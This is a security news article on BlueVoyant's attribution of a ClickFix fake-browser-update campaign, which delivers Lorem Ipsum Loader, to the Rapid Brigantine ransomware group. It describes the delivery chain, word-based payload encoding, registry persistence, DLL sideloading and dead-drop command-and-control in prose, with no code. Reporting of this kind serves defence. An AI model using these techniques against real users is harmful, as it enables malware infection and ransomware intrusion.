Rapid Brigantine ties ClickFix malware to fake updates

BlueVoyant has linked an active ClickFix malware campaign that uses fake browser update prompts to the Rapid Brigantine cybercrime group, following analysis of a delivery chain that deploys the Lorem Ipsum Loader malware.

Researchers said the campaign represents a shift from an earlier operation that distributed trojanised Microsoft Teams installers through search engine optimisation poisoning and malicious advertising. The current activity relies on compromised WordPress websites that display fraudulent browser update messages designed to persuade users to run commands in Windows Terminal.

According to BlueVoyant, the change appears to follow Microsoft's disruption of the Forging Marauder malware-signing service in May 2026. Researchers believe the loss of access to fraudulently obtained code-signing certificates forced operators to abandon signed installer delivery methods and adopt ClickFix techniques instead.

Delivery shift

The attack begins when users visit compromised websites displaying a message claiming their browser requires a security update. Users are instructed to launch Windows Terminal and paste a PowerShell command presented by the site.

The command downloads a ZIP archive containing the malware payload and retrieves a portable copy of Node.js version 7.10.1 from the official Node.js distribution site. Once downloaded, the script extracts the files and launches a JavaScript component known as Update.js.

BlueVoyant said the JavaScript dropper reconstructs malware payloads using a custom text-based encoding method. Instead of storing executable code directly, the malware converts lists of seemingly harmless words into binary data at runtime. Researchers said the technique complicates static analysis and signature-based detection.

The malware then creates a directory in the ProgramData folder, reconstructs several files, and establishes persistence through Windows registry run keys. The process ensures malware execution whenever the user logs into Windows.

Tooling continuity

Although the delivery mechanism has changed, BlueVoyant said the underlying malware infrastructure shows significant continuity with earlier Lorem Ipsum campaigns. Researchers identified the same payload reconstruction routines, DLL sideloading techniques, command-and-control architecture and dead-drop resolver methods across both operations.

The campaign uses a renamed version of Microsoft's ClickOnce Launch Utility to sideload malicious DLL files. Researchers observed two DLL variants, mscoree.dll and msvcp140.dll, providing multiple execution paths for the malware.

The Lorem Ipsum Loader subsequently retrieves additional malware components from command-and-control infrastructure whose locations are stored within attacker-controlled profiles on public websites. Researchers found operators had moved from LetsDiskuss to DigitalPoint while retaining the same encoding methods and delimiter conventions.

BlueVoyant also identified infrastructure designed to improve resilience. Each infected system communicates with multiple Cloudflare-protected command-and-control domains using a unique victim identifier. Researchers said the approach complicates disruption efforts and reduces the effectiveness of IP-based blocking.

Attribution evidence

BlueVoyant said multiple sources of intelligence support attribution to Rapid Brigantine, also known as Vanilla Tempest, DEV-0832, Vice Society and VICE SPIDER. The group has been active since at least 2022 and has been associated with ransomware families including Rhysida, BlackCat, Zeppelin and Quantum Locker.

Researchers pointed to Microsoft's previous disclosures involving fake Microsoft Teams installers, fraudulent signing certificates and Oyster malware delivery chains. They also cited findings from DFIR Report investigations that documented deployments of both Lorem Ipsum Loader and Rapid Brigantine-linked post-exploitation tools within the same intrusion.

BlueVoyant concluded that Lorem Ipsum is likely either a parallel loader or a successor loader within the Rapid Brigantine ecosystem rather than a separate malware operation. The company said the malware chain ultimately supports the group's established post-exploitation toolkit and ransomware deployment activities, particularly those involving Rhysida ransomware.

"Rather than functioning as an independent initial access broker, the Lorem Ipsum operation appears to be part of Rapid Brigantine's expanding initial access toolkit, operating alongside their Oyster malware pipeline and their Gootloader partnership with Lure Marauder," said Thomas Elkins and Joshua Green, Researchers, BlueVoyant.